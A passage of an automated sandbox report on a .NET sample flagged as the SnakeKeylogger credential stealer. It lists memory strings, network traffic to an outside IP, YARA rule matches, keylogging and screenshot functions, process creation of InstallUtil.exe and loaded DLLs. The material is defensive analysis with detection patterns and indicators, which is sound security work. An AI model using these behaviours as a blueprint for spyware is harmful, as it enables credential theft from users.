                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002E0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002E37000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002E7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EA3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.000000000403C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000413E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004042000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000411A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.000000000403C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000413E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004042000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E73000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003E9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.000000000411A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000003EE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2907422568.0000000004017000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: InstallUtil.exe, 00000005.00000002.2907422568.0000000004089000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002FB2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002FA3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                    Source: InstallUtil.exe, 00000005.00000002.2903836633.0000000002FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lBiq
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49920 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to capture screen (.Net source)
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                    Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EAB178 CreateProcessAsUserW,0_2_08EAB178
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_00A175A90_2_00A175A9
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_00A17BD00_2_00A17BD0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0587D3C10_2_0587D3C1
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0587D3D00_2_0587D3D0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0587A85C0_2_0587A85C
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_05A124880_2_05A12488
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_05A1DBE80_2_05A1DBE8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_05A124580_2_05A12458
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_05A1C3B00_2_05A1C3B0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_06D0D45B0_2_06D0D45B
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_06D0F15D0_2_06D0F15D
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_06D021000_2_06D02100
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_06D0E9D80_2_06D0E9D8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_06D0E9C80_2_06D0E9C8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764E5D00_2_0764E5D0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_076434480_2_07643448
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764F4180_2_0764F418
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764E5C00_2_0764E5C0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764F4530_2_0764F453
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_076434330_2_07643433
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_0764F43E0_2_0764F43E
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077FDB180_2_077FDB18
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077FCF010_2_077FCF01
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077FBE600_2_077FBE60
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077F3AE40_2_077F3AE4
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077F7CA00_2_077F7CA0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_077FF4480_2_077FF448
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA40700_2_08EA4070
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA0D400_2_08EA0D40
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EAB6F80_2_08EAB6F8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA62910_2_08EA6291
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA5B400_2_08EA5B40
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA18E10_2_08EA18E1
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA18F00_2_08EA18F0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA80C80_2_08EA80C8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA80D80_2_08EA80D8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA50880_2_08EA5088
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA50830_2_08EA5083
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA40600_2_08EA4060
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA00400_2_08EA0040
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA00130_2_08EA0013
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA09200_2_08EA0920
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA0D330_2_08EA0D33
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA09100_2_08EA0910
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA06E80_2_08EA06E8
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA06DB0_2_08EA06DB
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA92D00_2_08EA92D0
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EAF6880_2_08EAF688
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA9A380_2_08EA9A38
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA0B880_2_08EA0B88
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA0B980_2_08EA0B98
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA5B2F0_2_08EA5B2F
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeCode function: 0_2_08EA03300_2_08EA0330
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BED27D5_2_02BED27D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE53705_2_02BE5370
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEC1475_2_02BEC147
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEC7385_2_02BEC738
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BECA0D5_2_02BECA0D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE69A95_2_02BE69A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEE9885_2_02BEE988
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BECFA95_2_02BECFA9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE6FC85_2_02BE6FC8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BECCDD5_2_02BECCDD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEF6305_2_02BEF630
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEFA885_2_02BEFA88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE29E05_2_02BE29E0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BEE97B5_2_02BEE97B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 5_2_02BE3E095_2_02BE3E09
                    Source: pbCN4g6sN5.exe, 00000000.00000000.1652684658.0000000000AD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSky Email Verifier.exeF vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2374378056.000000000057E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2387318301.00000000076F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRP8SH.dll6 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2383848177.0000000004B30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMofInagitap.dll8 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exe, 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMofInagitap.dll8 vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exeBinary or memory string: OriginalFilenameSky Email Verifier.exeF vs pbCN4g6sN5.exe
                    Source: pbCN4g6sN5.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: pbCN4g6sN5.exe, d3A5.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.pbCN4g6sN5.exe.4b30000.4.raw.unpack, Class12_Startup.csTask registration methods: 'CreateCanceledTask'
                    Source: 0.2.pbCN4g6sN5.exe.365d150.3.raw.unpack, Class12_Startup.csTask registration methods: 'CreateCanceledTask'
                    Source: 0.2.pbCN4g6sN5.exe.36a2f30.0.raw.unpack, Class12_Startup.csTask registration methods: 'CreateCanceledTask'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pbCN4g6sN5.exe.logJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: NULL
                    Source: pbCN4g6sN5.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: pbCN4g6sN5.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: pbCN4g6sN5.exeReversingLabs: Detection: 71%
                    Source: unknownProcess created: C:\Users\user\Desktop\pbCN4g6sN5.exe "C:\Users\user\Desktop\pbCN4g6sN5.exe"
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
